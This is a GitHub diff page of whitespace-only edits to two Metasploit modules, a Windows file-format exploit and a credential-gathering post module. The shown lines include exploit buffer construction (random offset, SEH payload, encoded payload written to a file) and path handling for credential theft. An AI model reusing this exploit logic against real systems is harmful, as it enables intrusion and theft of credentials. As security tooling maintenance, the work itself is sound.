File tree Expand file tree Collapse file tree 2 files changed +3
-3
lines changed
exploits/windows/fileformat
post/windows/gather/credentials Expand file tree Collapse file tree 2 files changed +3
-3
lines changed Original file line number Diff line number Diff line change @@ -22,7 +22,7 @@ def initialize(info = {})
2222 'License' => MSF_LICENSE ,
2323 'Author' =>
2424 [
25- 'Mike Czumak' , # (T_v3rn1x) -- @SecuritySift
25+ 'Mike Czumak' , # (T_v3rn1x) -- @SecuritySift
2626 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
2727 ] ,
2828 'References' =>
@@ -64,7 +64,7 @@ def exploit
6464 buffer = "[Support Groups]\r \n Video="
6565 buffer << rand_text ( target [ 'Offset' ] )
6666 buffer << generate_seh_payload ( target . ret )
67- buffer << payload . encoded
67+ buffer << payload . encoded
6868 buffer << "\r \n [AssociateType]\r \n AssociateType =1"
6969
7070 file_create ( buffer )
Original file line number Diff line number Diff line change @@ -74,7 +74,7 @@ def run
7474 # Windows Vista and upwards points to ProgramData!
7575 all_users = expand_path ( "%ALLUSERSPROFILE%" )
7676
77- if all_users . include? 'ProgramData'
77+ if all_users . include? 'ProgramData'
7878 all_users . gsub! ( 'ProgramData' , 'Users\\All Users' )
7979 else
8080 all_users = "#{ all_users } \\ Application Data"
You can’t perform that action at this time.
0 commit comments